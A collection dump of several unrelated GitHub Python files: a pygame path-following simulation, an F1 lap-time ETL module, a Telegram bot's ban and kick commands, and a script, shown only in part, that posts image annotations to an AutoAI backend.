\n\n\n","repo_name":"hichiaty/SynthPy","sub_path":"NN/data_gen.py","file_name":"data_gen.py","file_ext":"py","file_size_in_byte":1620,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"74809974330","text":"\nimport sys\nsys.path.append(\"C:\\\\Users\\\\Luke\\\\Documents\\\\Learning Python\\\\\")\nimport LukeLibrary as LL\n\nimport math\nimport pygame\n\nscreenW = 700\nscreenH = 500\nscreen = pygame.display.set_mode((screenW, screenH))\n\nvehicleRadius = 20\n\nclass Path:\n def __init__(self, nodeCount, smoothingCount=-1, pathWidth_=vehicleRadius*2.5):\n self.nodeCount = nodeCount\n \n self.pathNoise = LL.generate1DNoise(self.nodeCount, noiseScale=0.1, smoothCount=smoothingCount)\n\n self.innerNodes = []\n self.outerNodes = []\n\n self.pathWidth = pathWidth_\n self.setNodePositions()\n\n def setNodePositions(self):\n\n centerNodes = []\n\n for c in range(0, self.nodeCount):\n theta = (math.pi * 2.0 / self.nodeCount) * c\n\n pathCenterRadiusX = (self.pathNoise[c] * screenW * 0.5)\n pathCenterRadiusY = (self.pathNoise[c] * screenH * 0.5)\n\n pathCenterNodeX = (screenW / 2) + (math.cos(theta) * pathCenterRadiusX)\n pathCenterNodeY = (screenH / 2) + (math.sin(theta) * pathCenterRadiusY)\n\n centerNodes.append(LL.Vector(pathCenterNodeX, pathCenterNodeY))\n \n self.innerNodes.clear()\n self.outerNodes.clear()\n for c in range(0, self.nodeCount):\n n = (c + 1) % self.nodeCount\n\n nodeDx = centerNodes[n].x - centerNodes[c].x\n nodeDy = centerNodes[n].y - centerNodes[c].y\n angleToNextNode = math.atan2(nodeDy, nodeDx)\n\n self.outerNodes.append(LL.Vector(\n centerNodes[c].x + (math.cos(angleToNextNode - (math.pi/2)) * (self.pathWidth / 2)),\n centerNodes[c].y + (math.sin(angleToNextNode - (math.pi/2)) * (self.pathWidth / 2))\n )\n )\n\n self.innerNodes.append(LL.Vector(\n centerNodes[c].x + (math.cos(angleToNextNode + (math.pi/2)) * (self.pathWidth / 2)),\n centerNodes[c].y + (math.sin(angleToNextNode + (math.pi/2)) * (self.pathWidth / 2))\n )\n )\n\n def render(self):\n \n for c in range(0, self.nodeCount):\n n = (c + 1) % self.nodeCount\n\n ix1 = int(self.innerNodes[c].x)\n iy1 = int(self.innerNodes[c].y)\n ix2 = int(self.innerNodes[n].x)\n iy2 = int(self.innerNodes[n].y)\n pygame.draw.line(\n screen, (0, 0, 0),\n (ix1, iy1), (ix2, iy2),\n 1\n )\n\n ox1 = int(self.outerNodes[c].x)\n oy1 = int(self.outerNodes[c].y)\n ox2 = int(self.outerNodes[n].x)\n oy2 = int(self.outerNodes[n].y)\n pygame.draw.line(\n screen, (0, 0, 0),\n (ox1, oy1), (ox2, oy2),\n 1\n )\npath = Path(64) #Path(256, 1200)\n\n# see \"path following 2.2: line 187 for next step\"\nclass Vehicle:\n def __init__(self):\n startX = (path.innerNodes[0].x + path.outerNodes[0].x) / 2\n startY = (path.innerNodes[0].y + path.outerNodes[0].y) / 2\n self.position = LL.Vector(startX, startY)\n self.velocity = LL.Vector(0, 0.001)\n\n self.sensorAngle = math.pi\n self.sensorCount = 5\n self.sensors = [LL.Sensor() for _ in range(0, self.sensorCount)]\n def move(self):\n self.position.add(self.velocity)\n\n def updateSensors(self):\n for i in range(0, self.sensorCount):\n theta = self.velocity.heading() + ((self.sensorAngle / (self.sensorCount-1)) * i) - (self.sensorAngle / 2)\n x = self.position.x + (math.cos(theta) * vehicleRadius)\n y = self.position.y + (math.sin(theta) * vehicleRadius)\n self.sensors[i].update(LL.Vector(x, y), theta)\n self.sensors[i].measure(screen, wallList)\n\n def render(self):\n pygame.draw.circle(\n screen, (150, 100, 150),\n (int(self.position.x), int(self.position.y)),\n vehicleRadius, 1\n )\n for s in self.sensors:\n s.display(screen)\n\n def update(self):\n self.move()\n self.updateSensors()\n self.render()\n\n\n\nPopulation = [Vehicle() for _ in range(0, 1)]\n\nwhile(True):\n screen.fill((255, 255, 255))\n path.render()\n\n for veh in Population:\n veh.update()\n\n \n pygame.display.flip()","repo_name":"Dowzer721/vsCode-Sync","sub_path":"Path Following/Path Following v3.0.py","file_name":"Path Following v3.0.py","file_ext":"py","file_size_in_byte":4308,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"10008001793","text":"\"\"\"\nETL helpers for JOLYON database and its various tables.\n\"\"\"\nimport os\nimport math\nimport numpy as np\nimport pandas as pd\nfrom jolyon.src.db_configs import DATA_FILES\n\n\ndef fetch_data_local(filepath=\"\"):\n \"\"\"\n Compiles an entire CSV dump from Ergast into a dictionary of relevant\n datasets/pd.DataFrames.\n\n Args:\n filepath : str.\n A filepath to the CSV dump\n\n Returns : dict[]\n A dictionary of datasets in the Ergast CSV dump.\n \"\"\"\n data = {}\n for item in DATA_FILES:\n item_df = pd.read_csv(f\"{filepath}{item}\")\n data[item.replace(\".csv\", \"\")] = item_df\n return data\n\n\ndef parse_pit_stops(pit_stop_df):\n \"\"\"\n Parses the pit_stops.csv file provided by Ergast.\n\n Args:\n pit_stop_df : pd.DataFrame\n The dataframe containing raw pit_stops.csv\n Returns : pd.DataFrame\n A processed version of 'pit_stops.csv'\n \"\"\"\n pit_stop_df_copy = pit_stop_df.copy()\n pit_stop_df_copy[\"seconds\"] = np.divide(\n pit_stop_df_copy[\"milliseconds\"].values, 1000.0\n )\n return pit_stop_df_copy[[\"raceId\", \"driverId\", \"stop\", \"lap\", \"seconds\"]]\n\n\ndef parse_lap_times(data):\n \"\"\"\n Performs basic wrangling/processing on the lap_times dataset.\n\n Args:\n data : dict\n A dictionary of data, as outputted by fetch_data_local()\n\n Returns : pd.DataFrame\n Wrangled lap time data.\n \"\"\"\n lap_time_df = data[\"lap_times\"].copy()\n lap_time_df[\"seconds\"] = np.divide(lap_time_df[\"milliseconds\"].values, 1000.0)\n lap_time_df = pd.merge(\n lap_time_df,\n data[\"results\"].groupby(\"raceId\", as_index=False)[\"laps\"].max(),\n how=\"inner\",\n on=\"raceId\",\n ).rename(columns={\"laps\": \"race_laps\"})\n lap_time_df[\"pct_complete\"] = np.divide(\n lap_time_df.lap.values, lap_time_df.race_laps.values\n )\n\n pit_stop_df = parse_pit_stops(data[\"pit_stops\"])\n pit_stop_df_2 = pit_stop_df.copy()\n pit_stop_df_2[\"lap\"] = pit_stop_df_2[\"lap\"].values + 1\n\n combined_df = (\n lap_time_df.merge(\n pit_stop_df.drop(columns=[\"seconds\"]),\n how=\"left\",\n on=[\"raceId\", \"driverId\", \"lap\"],\n )\n .merge(\n pit_stop_df_2[[\"raceId\", \"driverId\", \"lap\", \"stop\"]],\n how=\"left\",\n on=[\"raceId\", \"driverId\", \"lap\"],\n suffixes=[\"_in\", \"_out\"],\n )\n .sort_values([\"raceId\", \"driverId\", \"lap\"])\n .fillna(value={\"stop_in\": 0, \"stop_out\": 0})\n )\n\n combined_df[\"stops\"] = combined_df.groupby([\"raceId\", \"driverId\"])[\n \"stop_out\"\n ].cummax()\n combined_df[\"total_seconds\"] = combined_df.groupby([\"raceId\", \"driverId\"])[\n \"seconds\"\n ].cumsum()\n\n combined_df[\"stint\"] = combined_df[\"stops\"].values + 1\n combined_df[\"is_inlap\"] = (combined_df.stop_in.values > 0).astype(int)\n combined_df[\"is_outlap\"] = (combined_df.stop_out.values > 0).astype(int)\n return combined_df\n\n\ndef parse_quali_df(quali_df, fill_value=np.nan):\n \"\"\"\"\"\"\n quali_df_new = (\n quali_df.copy()\n .reset_index(drop=True)\n .rename(columns={\"q1\": \"q1_str\", \"q2\": \"q2_str\", \"q3\": \"q3_str\"})\n )\n for q in [\"q1\", \"q2\", \"q3\"]:\n quali_secs = []\n for item in quali_df[q].values:\n try:\n lap_time_secs = 60.0 * int(item.split(\":\")[0]) + float(\n item.split(\":\")[1]\n )\n except (TypeError, ValueError, AttributeError):\n lap_time_secs = fill_value\n quali_secs.append(lap_time_secs)\n quali_df_new[q] = quali_secs\n for q in [\"q1\", \"q2\", \"q3\"]:\n quali_df_new = quali_df_new.sort_values([\"raceId\", q])\n quali_df_new[f\"rank_{q}\"] = 1\n quali_df_new[f\"rank_{q}\"] = quali_df_new.groupby([\"raceId\"], as_index=False)[\n f\"rank_{q}\"\n ].cumsum()\n return quali_df_new\n\n\ndef parse_quali_summary(qualifying_df):\n \"\"\"\n Provides a summary snapshot of qualifying, including:\n * Times necessary to have escaped Q1, Q2\n * Pole time\n * Best overall time\n\n Args:\n qualifying_df : pd.DataFrame\n A WRANGLED qualifying df, as outputted by parse_quali_df()\n Returns : pd.DataFrame\n \"\"\"\n quali_df = qualifying_df.copy()\n quali_df[\"best_time\"] = quali_df[[\"q1\", \"q2\", \"q3\"]].apply(\n lambda x: min(x[\"q1\"], x[\"q2\"], x[\"q3\"]), axis=1\n )\n q1_cut = (\n quali_df.query(\"rank_q1 >= 16\")\n .sort_values([\"raceId\", \"rank_q1\"])\n .groupby([\"raceId\"], as_index=False)\n .head(1)\n )\n\n q2_cut = (\n quali_df.query(\"rank_q2 >= 11\")\n .sort_values([\"raceId\", \"rank_q2\"])\n .groupby([\"raceId\"], as_index=False)\n .head(1)\n )\n\n pole_times = quali_df.query(\"rank_q3 == 1\")\n\n best_times = quali_df.groupby([\"raceId\"], as_index=False)[\"best_time\"].min()\n\n result = (\n q1_cut[[\"raceId\", \"q1\"]]\n .merge(q2_cut[[\"raceId\", \"q2\"]], how=\"left\", on=\"raceId\")\n .merge(pole_times[[\"raceId\", \"q3\"]], how=\"left\", on=\"raceId\")\n .merge(best_times[[\"raceId\", \"best_time\"]])\n .rename(\n columns={\"q1\": \"q1_escape_time\", \"q2\": \"q2_escape_time\", \"q3\": \"pole_time\"}\n )\n )\n result[\"time_107\"] = 1.07 * result.pole_time.values\n return result\n\n\ndef parse_race_df():\n pass\n\n\ndef parse_driver_df(driver_df):\n driver_df_copy = driver_df.copy()\n driver_df_copy[\"number\"] = np.array(\n [int(str(item)) if \"N\" not in item else np.nan for item in driver_df.number]\n )\n # driver_df_copy['dob'] = np.array([pd.Timestamp(item).date() for item in driver_df.dob])\n driver_df_copy[\"name\"] = np.array(\n [\n f\"{fore} {sur}\".replace(\"'\", \"\")\n for fore, sur in list(zip(driver_df.forename, driver_df.surname))\n ]\n )\n return driver_df_copy\n\n\ndef parse_result_df(data):\n result_df = data[\"results\"].copy()\n result_df = pd.merge(\n result_df, data[\"races\"][[\"year\", \"raceId\"]], how=\"inner\", on=[\"raceId\"]\n )\n result_df = pd.merge(\n result_df,\n result_df.groupby(\"raceId\", as_index=False)[\"laps\"].max(),\n how=\"inner\",\n on=\"raceId\",\n suffixes=[\"\", \"_all\"],\n )\n result_df[\"pct_complete\"] = np.divide(\n result_df.laps.values, result_df.laps_all.values\n )\n\n result_df[\"not_on_grid\"] = (result_df.grid.values == 0).astype(int)\n result_df[\"grid\"] = np.array([100 if i == 0 else i for i in result_df.grid])\n result_df[\"classification\"] = result_df[[\"positionText\", \"positionOrder\"]].apply(\n lambda x: 100\n if x[\"positionText\"] in [\"W\", \"F\"]\n else 99\n if x[\"positionText\"] == \"R\"\n else int(x[\"positionOrder\"]),\n axis=1,\n )\n result_df[\"position\"] = result_df.positionOrder.values.astype(int)\n result_df[\"pitlane_start\"] = (\n (result_df.grid.values == 100) * (result_df.not_on_grid.values == 1)\n ).astype(int)\n\n result_df = pd.merge(result_df, data[\"status\"], how=\"left\", on=\"statusId\")\n result_df[\"finished_running\"] = np.array(\n [int(\"Lap\" in item or item == \"Finished\") for item in result_df.status.values]\n )\n # TODO: parse race time and fastest laps\n return result_df\n\n\ndef parse_lap_time_deltas(data):\n \"\"\"\"\"\"\n\n results = (\n data[\"results\"]\n .query(\"year >= 2005\")\n .rename(columns={\"position\": \"finish_position\"})\n )\n lap_times = parse_lap_times(data)[\n [\"raceId\", \"driverId\", \"position\", \"seconds\", \"total_seconds\", \"lap\"]\n ]\n\n delta_df = (\n pd.merge(\n results[\n [\"raceId\", \"driverId\", \"laps\", \"finished_running\", \"finish_position\"]\n ],\n results[\n [\"raceId\", \"driverId\", \"laps\", \"finished_running\", \"finish_position\"]\n ],\n how=\"inner\",\n on=\"raceId\",\n suffixes=[\"_ahead\", \"_behind\"],\n )\n .merge(\n lap_times[[\"raceId\", \"lap\"]]\n .groupby([\"raceId\", \"lap\"], as_index=False)\n .head(1),\n how=\"left\",\n on=[\"raceId\"],\n )\n .merge(\n lap_times.rename(columns={\"driverId\": \"driverId_ahead\"}),\n how=\"left\",\n on=[\"raceId\", \"driverId_ahead\", \"lap\"],\n )\n .merge(\n lap_times.rename(columns={\"driverId\": \"driverId_behind\"}),\n how=\"left\",\n on=[\"raceId\", \"driverId_behind\", \"lap\"],\n suffixes=[\"_ahead\", \"_behind\"],\n )\n .sort_values(\n [\n \"raceId\",\n \"lap\",\n \"position_ahead\",\n \"position_behind\",\n \"total_seconds_ahead\",\n \"total_seconds_behind\",\n \"finish_position_ahead\",\n \"finish_position_behind\",\n ]\n )\n .reset_index(drop=True)\n )\n\n # compute delta on the last lap\n delta_df[\"lap_time_delta\"] = np.subtract(\n delta_df.seconds_ahead.values, delta_df.seconds_behind.values,\n )\n # compute overall race delta\n delta_df[\"race_time_delta\"] = np.subtract(\n delta_df.total_seconds_ahead.values, delta_df.total_seconds_behind.values,\n )\n\n # compute laps down\n delta_df[\"is_lap_down_ahead\"] = np.multiply(\n np.isnan(delta_df.seconds_ahead.values).astype(int),\n delta_df.finished_running_ahead.values,\n )\n\n delta_df[\"is_lap_down_behind\"] = np.multiply(\n np.isnan(delta_df.seconds_behind.values).astype(int),\n delta_df.finished_running_behind.values,\n )\n\n # compute retirements\n delta_df[\"is_retired_ahead\"] = np.multiply(\n np.isnan(delta_df.seconds_ahead.values).astype(int),\n 1 - delta_df.is_lap_down_ahead.values,\n )\n\n delta_df[\"is_retired_behind\"] = np.multiply(\n np.isnan(delta_df.seconds_behind.values).astype(int),\n 1 - delta_df.is_lap_down_behind.values,\n )\n\n delta_df[\"ctr\"] = 1\n\n delta_df[\"row_idx_behind\"] = (\n delta_df.sort_values(\n [\n \"raceId\",\n \"lap\",\n \"total_seconds_ahead\",\n \"finish_position_ahead\",\n \"total_seconds_behind\",\n \"finish_position_behind\",\n ]\n )\n .groupby([\"raceId\", \"lap\", \"driverId_ahead\"])[\"ctr\"]\n .cumsum()\n )\n\n delta_df[\"position_behind\"] = delta_df[[\"position_behind\", \"row_idx_behind\"]].apply(\n lambda x: x[\"row_idx_behind\"]\n if np.isnan(x[\"position_behind\"]) or math.isnan(x[\"position_behind\"])\n else x[\"position_behind\"],\n axis=1,\n )\n\n delta_df[\"row_idx_ahead\"] = (\n delta_df.sort_values(\n [\n \"raceId\",\n \"lap\",\n \"total_seconds_behind\",\n \"finish_position_behind\",\n \"total_seconds_ahead\",\n \"finish_position_ahead\",\n ]\n )\n .groupby([\"raceId\", \"lap\", \"driverId_behind\"])[\"ctr\"]\n .cumsum()\n )\n\n delta_df[\"position_ahead\"] = delta_df[[\"position_ahead\", \"row_idx_ahead\"]].apply(\n lambda x: x[\"row_idx_ahead\"]\n if np.isnan(x[\"position_ahead\"]) or math.isnan(x[\"position_ahead\"])\n else x[\"position_ahead\"],\n axis=1,\n )\n\n return delta_df\n\n\ndef fetch_parse_data():\n \"\"\"\n Main ETL function: reads in and processes everything thus far\n \"\"\"\n # TODO: switch print --> logger.info\n data = fetch_data_local(\"/Users/IKleisle/F1/data/\")\n print(\"Data acquired.\")\n\n data[\"qualifying\"] = parse_quali_df(data[\"qualifying\"])\n print(\"Quali data wrangled.\")\n\n data[\"qualifying_summary\"] = parse_quali_summary(data[\"qualifying\"])\n print(\"Quali summary data wrangled.\")\n\n data[\"drivers\"] = parse_driver_df(data[\"drivers\"])\n print(\"Driver metadata wrangled.\")\n\n data[\"lap_times_full\"] = parse_lap_times(data)\n print(\"Lap times wrangled.\")\n\n data[\"results\"] = parse_result_df(data)\n print(\"Results wrangled.\")\n\n data[\"lap_time_deltas\"] = parse_lap_time_deltas(data)\n print(\"Lap time deltas wrangled.\")\n\n print(\"ETL complete!\")\n return data\n","repo_name":"isaackleislemurphy/jolyon","sub_path":"src/etl.py","file_name":"etl.py","file_ext":"py","file_size_in_byte":12145,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"26666230220","text":"import asyncio\nfrom time import time\nfrom pyrogram import filters\nfrom pyrogram.types import Message\nfrom Miyuki.utils.extract_user import extract_user\nfrom Miyuki import BOT_ID, SUDOERS, app\nfrom Miyuki.utils.functions import (extract_user_and_reason,\n time_converter)\nfrom Miyuki.core.decorators.permissions import adminsOnly\nfrom pyrogram.types import Message\nfrom lang import get_command\nfrom Miyuki.utils.commands import *\nfrom Miyuki.utils.lang import *\n\nKICK_ME = get_command(\"KICK_ME\")\nSKICK = get_command(\"SKICK\")\nKICK = get_command(\"KICK\")\nBAN = get_command(\"BAN\")\nUNBAN = get_command(\"UNBAN\")\nSBAN = get_command(\"SBAN\")\n\n\nasync def member_permissions(chat_id: int, user_id: int):\n perms = []\n try:\n member = await app.get_chat_member(chat_id, user_id)\n except Exception:\n return []\n if member.can_post_messages:\n perms.append(\"can_post_messages\")\n if member.can_edit_messages:\n perms.append(\"can_edit_messages\")\n if member.can_delete_messages:\n perms.append(\"can_delete_messages\")\n if member.can_restrict_members:\n perms.append(\"can_restrict_members\")\n if member.can_promote_members:\n perms.append(\"can_promote_members\")\n if member.can_change_info:\n perms.append(\"can_change_info\")\n if member.can_invite_users:\n perms.append(\"can_invite_users\")\n if member.can_pin_messages:\n perms.append(\"can_pin_messages\")\n if member.can_manage_voice_chats:\n perms.append(\"can_manage_voice_chats\")\n return perms\n\nadmins_in_chat = {}\n\nasync def list_admins(chat_id: int):\n return [ member.user.id\n async for member in app.iter_chat_members(\n chat_id, filter=\"administrators\"\n )]\n\n\nasync def current_chat_permissions(chat_id):\n perms = []\n perm = (await app.get_chat(chat_id)).permissions\n if perm.can_send_messages:\n perms.append(\"can_send_messages\")\n if perm.can_send_media_messages:\n perms.append(\"can_send_media_messages\")\n if perm.can_send_other_messages:\n perms.append(\"can_send_other_messages\")\n if perm.can_add_web_page_previews:\n perms.append(\"can_add_web_page_previews\")\n if perm.can_send_polls:\n perms.append(\"can_send_polls\")\n if perm.can_change_info:\n perms.append(\"can_change_info\")\n if perm.can_invite_users:\n perms.append(\"can_invite_users\")\n if perm.can_pin_messages:\n perms.append(\"can_pin_messages\")\n\n return perms\n\n\n@app.on_message(command(KICK_ME) )\n@language\nasync def kickFunc(client, message: Message, _):\n reason = None\n if len(message.text.split()) >= 2:\n reason = message.text.split(None, 1)[1]\n try:\n await message.chat.ban_member(message.from_user.id)\n txt = \"you're right - get out.\"\n txt += f\"\\nReason: {reason}\" if reason else \"\"\n await message.reply_text(txt)\n await message.chat.unban_member(message.from_user.id)\n except Exception as ef:\n await message.reply_text(f\"{ef}\")\n return\n\n@app.on_message(command(SKICK))\n@adminsOnly(\"can_restrict_members\")\n@language\nasync def kickFunc(client, message: Message, _):\n if len(message.text.split()) == 1 and not message.reply_to_message:\n return\n try:\n user_id = await extract_user(app, message)\n except Exception:\n return \n if not user_id:\n await message.reply_text(_[\"ban2\"])\n return \n try:\n await message.chat.ban_member(user_id)\n await message.delete()\n if message.reply_to_message:\n await message.reply_to_message.delete()\n await message.chat.unban_member(user_id)\n except Exception as ef:\n await message.reply_text(f\"{ef}\")\n return\n\n@app.on_message(command(KICK))\n@adminsOnly(\"can_restrict_members\")\n@language\nasync def kickFunc(client, message: Message, _):\n user_id, reason = await extract_user_and_reason(message, sender_chat=True)\n \n if not user_id:\n return await message.reply_text(_[\"ban3\"])\n if user_id == BOT_ID:\n return await message.reply_text(_[\"ban4\"])\n if user_id in SUDOERS:\n return await message.reply_text(_[\"ban6\"])\n if user_id in await list_admins(message.chat.id):\n return await message.reply_text(_[\"ban7\"])\n mention = (await app.get_users(user_id)).mention\n msg = f\"\"\"\n{mention}** Was Kicked By:** {message.from_user.mention if message.from_user else 'Anon'}\n**Reason:** {reason or 'No Reason Provided.'}\"\"\"\n if message.command[0][0] == \"d\":\n await message.reply_to_message.delete()\n await message.chat.ban_member(user_id)\n await message.reply_text(msg)\n await asyncio.sleep(1)\n await message.chat.unban_member(user_id)\n\n\n@app.on_message(command(BAN))\n@adminsOnly(\"can_restrict_members\")\n@language\nasync def banFunc(client, message: Message, _):\n user_id, reason = await extract_user_and_reason(message, sender_chat=True)\n\n if not user_id:\n return await message.reply_text(_[\"ban3\"])\n if user_id == BOT_ID:\n return await message.reply_text(_[\"ban4\"])\n if user_id in SUDOERS:\n return await message.reply_text(_[\"ban6\"])\n user_status = (await message.chat.get_member(user_id)).status \n if user_status in {\"creator\", \"administrator\"}:\n return\n try:\n mention = (await app.get_users(user_id)).mention\n except IndexError:\n mention = (\n message.reply_to_message.sender_chat.title\n if message.reply_to_message\n else \"Anon\"\n )\n\n msg = (\n f\"{mention}\\n\"\n f\"**Was Banned By:** {message.from_user.mention if message.from_user else 'Anon'}\\n\"\n )\n if message.command[0][0] == \"d\":\n await message.reply_to_message.delete()\n if message.command[0] == \"tban\":\n split = reason.split(None, 1)\n time_value = split[0]\n temp_reason = split[1] if len(split) > 1 else \"\"\n temp_ban = await time_converter(message, time_value)\n msg += f\"**Banned For:** {time_value}\\n\"\n if temp_reason:\n msg += f\"**Reason:** {temp_reason}\"\n try:\n if len(time_value[:-1]) < 3:\n await message.chat.ban_member(user_id, until_date=temp_ban)\n await message.reply_text(msg)\n else:\n await message.reply_text(_[\"ban14\"])\n except AttributeError:\n pass\n return\n if reason:\n msg += f\"**Reason:** {reason}\"\n await message.chat.ban_member(user_id)\n await message.reply_text(msg)\n\n\n@app.on_message(command(UNBAN) & filters.incoming)\n@adminsOnly(\"can_restrict_members\")\n@language\nasync def unbanFunc(client, message: Message, _):\n if len(message.command) == 2:\n user = message.text.split(None, 1)[1]\n elif len(message.command) == 1 and message.reply_to_message:\n user = message.reply_to_message.from_user.id\n else:\n return await message.reply_text(_[\"ban15\"])\n await message.chat.unban_member(user)\n umention = (await app.get_users(user)).mention\n await message.reply_text(_[\"ban14\"].format({umention}))\n\n\n@app.on_message(command(SBAN) & filters.incoming)\n@adminsOnly(\"can_restrict_members\")\nasync def kickFunc(client, message: Message, _):\n if len(message.text.split()) == 1 and not message.reply_to_message:\n return\n try:\n user_id = await extract_user(app, message)\n except Exception:\n return \n if not user_id:\n await message.reply_text(\"Cannot find user to kick\")\n return \n try:\n await message.chat.ban_member(user_id)\n await message.delete()\n if message.reply_to_message:\n await message.reply_to_message.delete()\n except Exception as ef:\n await message.reply_text(f\"{ef}\")\n return\n\n__MODULE__ = \"Restrict\"\n__HELP__ = \"\"\"\nSome people need to be publicly banned; spammers, annoyances, or just trolls.\n\nThis module allows you to do that easily, by exposing some common actions, so everyone will see!\n\n**User commands:**\n- /kickme: Users that use this, kick themselves.\n\n**Admin commands:**\n- /ban: Ban a user.\n- /dban: Ban a user by reply, and delete their message.\n- /sban: Silently ban a user, and delete your message.\n- /tban: Temporarily ban a user. Example time values: 4m = 4 minutes, 3h = 3 hours, 6d = 6 days, 5w = 5 weeks.\n- /unban: Unban a user.\n\n- /mute: Mute a user.\n- /dmute: Mute a user by reply, and delete their message.\n- /smute: Silently mute a user, and delete your message.\n- /tmute: Temporarily mute a user. Example time values: 4m = 4 minutes, 3h = 3 hours, 6d = 6 days, 5w = 5 weeks.\n- /unmute: Unmute a user.\n\n- /kick: Kick a user.\n- /dkick: Kick a user by reply, and delete their message.\n- /skick: Silently kick a user, and delete your message\n\n**Examples:**\n- Mute a user for two hours.\n- `/tmute @username 2h`\n\"\"\"\n","repo_name":"VenujASB/MiyukiXBot","sub_path":"Miyuki/plugins/ban.py","file_name":"ban.py","file_ext":"py","file_size_in_byte":8843,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"78"} +{"seq_id":"22991232923","text":"\"\"\"\nThis file contains the functions to send the data to AutoAI for annotation\n\"\"\"\n# importing libraries\nimport requests\nimport random\nimport shutil\nimport json\nimport random\nimport string\nimport math\nimport operator\nfrom functools import reduce\nimport datetime\nimport numpy as np\nimport threading\nimport os\n\n# importing user defined modules\n\nCLASSES_US = [\"green\", \"golden\", \"mech\"]\nAUTOAI_URL = \"http://10.10.10.10/backend/resource/\"\nDETECTION_MODEL_ID = \"64b536d86310da323b6b0266\"\nCLASSIFICATION_MODEL_ID = \"64b536e46310da80366b02be\"\nTAG_PREFIX = \"GoogleNext_\"\n\n\ndef transform_bbox_to_original(cropped_bbox, crop_start_x, crop_start_y):\n # Unpack the cropped bounding box coordinates\n cropped_x1, cropped_y1 = cropped_bbox\n\n # Calculate the coordinates of the bounding box in the original image\n original_x1 = cropped_x1 + crop_start_x\n original_y1 = cropped_y1 + crop_start_y\n\n # Return the transformed bounding box coordinates\n return original_x1, original_y1\n\n\n# Utility functions\ndef random_id(digit_count):\n return ''.join(random.choice(string.ascii_lowercase + string.digits) for _ in range(digit_count))\n\n\nhighContrastingColors = ['rgba(0,255,81,1)', 'rgba(255,219,0,1)', 'rgba(255,0,0,1)', 'rgba(0,4,255,1)',\n 'rgba(227,0,255,1)']\n\nannotation_id = {}\nfor index, object_class in enumerate(CLASSES_US):\n annotation_id[object_class] = index\nannotation_id[\"screw\"] = len(CLASSES_US)\n\n\n# Function to send to AutoAI\ndef send_to_autoai(status, csv, model, label, tag, confidence_score, prediction, model_type,\n filename, imageAnnotations, file_type=\"image/png\", prompt=None):\n try:\n payload = {'status': status,\n 'csv': csv,\n 'model': model,\n 'label': label,\n 'tag': TAG_PREFIX + tag,\n 'confidence_score': confidence_score,\n 'prediction': prediction,\n 'imageAnnotations': imageAnnotations,\n 'model_type': model_type}\n\n if prompt is not None:\n payload['prompt'] = prompt\n\n files = [('resource', (filename, open(filename, 'rb'), file_type))]\n headers = {}\n response = requests.request(\n 'POST', AUTOAI_URL, headers=headers, data=payload, files=files, verify=False)\n if response.status_code == 200:\n print('Successfully sent to AutoAI', end=\"\\r\")\n return True\n else:\n print('Error while sending to AutoAI')\n return False\n\n except Exception as e:\n print('Error while sending data to Auto AI : ', e)\n return False\n\n\n# Function to create annotation in AutoAI format\ndef json_creater(inputs, closed):\n data = []\n for index, input in enumerate(inputs):\n # JSON Object for the metadata and vertices\n json_id = random_id(8)\n color = highContrastingColors[index % 5]\n sub_json_data = {}\n sub_json_data[\"id\"] = json_id\n sub_json_data[\"name\"] = json_id\n sub_json_data[\"color\"] = color\n sub_json_data[\"isClosed\"] = closed\n sub_json_data[\"selectedOptions\"] = [{\"id\": \"0\", \"value\": \"root\"},\n {\"id\": annotation_id[inputs[input]], \"value\": inputs[input]}]\n\n points = eval(input)\n # points = np.fromstring(input, dtype=int)\n\n\n sorted_coords = points.copy()\n vertices = []\n is_first = True\n for vertex in sorted_coords:\n print(vertex)\n vertex_json = {}\n if is_first:\n vertex_json[\"id\"] = json_id\n vertex_json[\"name\"] = json_id\n is_first = False\n else:\n json_id = random_id(8)\n vertex_json[\"id\"] = json_id\n vertex_json[\"name\"] = json_id\n vertex_json[\"x\"] = vertex[0]\n vertex_json[\"y\"] = vertex[1]\n vertices.append(vertex_json)\n sub_json_data[\"vertices\"] = vertices\n data.append(sub_json_data)\n return json.dumps(data)\n\n\ndef send_to_autoai_image(status, csv, model, label, tag, confidence_score, prediction, model_type,\n filename, imageAnnotations, file_type, file_prefix):\n\n\n\n shutil.copy(filename, file_prefix + '_' + filename)\n filename = file_prefix + '_' + filename\n send_to_autoai(status, csv, model, label, tag, confidence_score, prediction, model_type,\n filename, imageAnnotations, file_type, None)\n os.remove(filename)\n\n\ndef send_to_autoai_annotation(status, csv, model, label, tag, confidence_score, prediction, model_type,\n filename, imageAnnotations, file_type, file_prefix,\n\n boxes, labels, cropping_rect):\n li = {}\n try:\n boxes = boxes.cpu().tolist()\n except:\n pass\n\n for labeld, box in zip(labels, boxes):\n # coord = box\n # xmin, ymin, xmax, ymax = round(coord[0]), round(coord[1]), round(coord[2]), round(coord[3])\n # li[f\"[[{xmin}, {ymin}], [{xmin}, {ymax}], [{xmax}, {ymax}], [{xmax}, {ymin}]]\"] = labeld\n\n coord = box\n coord = coord.tolist()\n temp = []\n for i in coord:\n # temp.append(i[0])\n\n corrected_coords = transform_bbox_to_original(i[0], cropping_rect[0], cropping_rect[1])\n temp.append(corrected_coords)\n\n coord = temp\n li[str(coord)] = labeld\n\n\n annotations = json_creater(li, True)\n send_to_autoai(status=status,\n csv=csv, # + \"
Annotations : %s\" % str(np.array(boxes, dtype=np.int)),\n model=model,\n label=label,\n tag=tag,\n confidence_score=confidence_score,\n prediction=prediction,\n model_type=model_type,\n filename=filename,\n imageAnnotations=annotations,\n file_type=file_type,\n prompt=None)\n # os.remove(filename)\n\n\n\ndef send_to_autoai_classes(status, csv, model, label, tag, confidence_score, prediction, model_type,\n filename, imageAnnotations, file_type,\n\n classes, boxes, scores, files_crop, object_ids):\n\n for predicted_label, box, score, _ in zip(classes, boxes, scores, files_crop):\n csv = csv + \"
%s : %s : %s\" % (predicted_label, box, round(np.max(score) * 100, 2))\n\n for predicted_label, _, score, file, object_id in zip(classes, boxes, scores, files_crop, object_ids):\n new_csv = csv + \"
